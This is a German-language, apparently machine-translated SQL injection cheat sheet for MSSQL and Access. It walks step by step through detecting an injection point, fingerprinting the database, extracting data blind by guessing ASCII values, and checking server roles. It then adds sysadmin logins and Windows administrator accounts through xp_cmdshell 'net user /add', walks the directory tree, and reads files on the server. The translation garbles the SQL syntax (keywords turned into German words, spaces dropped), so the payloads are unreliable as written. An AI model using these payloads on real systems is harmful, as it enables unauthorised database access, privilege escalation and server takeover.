1. Bestimmen Sie, ob die Injektion vorliegt
; und 1 = 1
; und 1 = 2
2. Vorläufiger Urteil darüber, ob es sich um MSSQL handelt
; Anduser> 0
3.. Injektionsparameter sind Zeichen
'und [Abfragezustand] und' '='
4. Während der Suche keine Filterparameter
'und [Abfragezustand] und'%25 '='
5. Datenbanksystem
; und (selectCount (*) aus sysObjects)> 0msssql
; und (selectCount (*) vonMsSysObjects)> 0Access
6. Erraten Sie die Datenbank
; und (selectCount (*) aus [Datenbankname])> 0
7. Vermutlich das Feld
; und (selectCount (Feldname) aus dem Datenbanknamen)> 0
8. Vermutlich die Rekordlänge im Feld
; und (selectTop1len (Feldname) aus dem Datenbanknamen)> 0
9. (1) Erraten Sie den ASCII -Wert des Feldes (Zugriff)
; und (selectTop1asc (MID (Feldname, 1, 1)) aus Datenbankname)> 0
(2) Erraten Sie den ASCII -Wert des Feldes (MSSQL)
; und (selectTop1unicode (Substring (Feldname, 1, 1)) aus dem Datenbanknamen)> 0
10. Testberechtigungsstruktur (MSSQL)
; und 1 = (selektis_srvrolemember ('sysadmin'));
; und 1 = (selektis_srvrolemember ('serveradmin'));
; und 1 = (selektis_srvrolemember ('setupadmin'));
; und 1 = (selektis_srvrolemember ('SecurityAdmin'));
; und 1 = (selektis_srvrolemember ('diskadmin'));--
; und 1 = (selektis_srvrolemember ('bulkadmin'));-
; und 1 = (selektis_member ('db_owner'));--------
11. MSSQL und Systemkonto hinzufügen
; execmaster.dbo.sp_addloginusername;--
; execmaster.dbo.sp_passwordnull, Benutzername, Passwort;-
; execmaster.dbo.sp_addsrvrolemembersysadminusername;--
; execmaster.dbo.xp_cmdshell'netUserusernamePassword/Workstations:*/Times: All/passwechsel: yes/passwordReq: yes/active: yes/add ';---------------------
; execmaster.dbo.xp_cmdshell'netUserusernamePassword/add ';-------
; execmaster.dbo.xp_cmdshell'netLocalGroupAdministratorsusername/add ';
12. (1) Übertragen Sie das Verzeichnis
; creatEtableDirs (Pathsvarchar (100), Idint)
; InsertDirsexecmaster.dbo.xp_dirtree'c:/'
; und (selectTop1pathsfromdirs)> 0
; und (selectTop1pathsfromdirswherepathsnotin ('Pfade aus dem vorherigen Schritt erhalten))>)
(2) Durchqueren Sie das Verzeichnis
; createTabletemp (idnvarchar (255), num1nvarchar (255), num2nvarchar (255), num3nvarchar (255));-------------------------------
; InsertTempexecmaster.dbo.xp_availablemedia; -Gibe alle aktuellen Laufwerke
; InsertIntOtemp (ID) execmaster.dbo.xp_subdirs'c:/';
; InsertIntotemp (ID, Num1) ExecMaster.dbo.xp_dirtree'c:/';
; InsertIntotemp (ID) execmaster.dbo.xp_cmdshell'typec: /web/index.asp ';-den Inhalt der Datei anzeigen
